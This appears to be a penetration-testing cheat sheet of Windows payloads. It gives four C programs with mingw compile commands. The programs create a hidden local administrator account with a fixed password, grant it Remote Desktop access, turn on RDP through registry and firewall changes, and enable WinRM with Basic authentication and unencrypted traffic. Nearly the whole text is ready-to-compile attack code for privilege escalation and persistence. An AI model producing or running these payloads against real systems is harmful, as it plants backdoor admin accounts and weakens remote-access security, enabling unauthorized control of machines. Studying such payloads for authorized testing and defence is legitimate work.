Windows Compileable Payloads
Simple payload, unlikely you'll use something this simple unless you have access as another user via RDP.
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Add a user with RDP
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave3 password123! /add");
i = system ("net localgroup administrators dave3 /add");
i = system ("net localgroup \"Remote Desktop Users\" dave3 /add");
return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Useful for enabling RDP if it hasnt been already
#include <stdlib.h>
int main ()
{
int i;
i = system ("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
i = system ("netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes");
i = system ("net user dave3 password123! /add");
i = system ("net localgroup administrators dave3 /add");
i = system ("net localgroup \"Remote Desktop Users\" dave3 /add");
return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Enable WinRM
#include <stdlib.h>
int main ()
{
int i;
i = system("winrm quickconfig -quiet");
i = system("winrm set winrm/config/service/auth @{Basic=\"true\"}");
i = system("winrm set winrm/config/service @{AllowUnencrypted=\"true\"}");
i = system ("net user dave3 password123! /add");
i = system ("net localgroup administrators dave3 /add");
return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe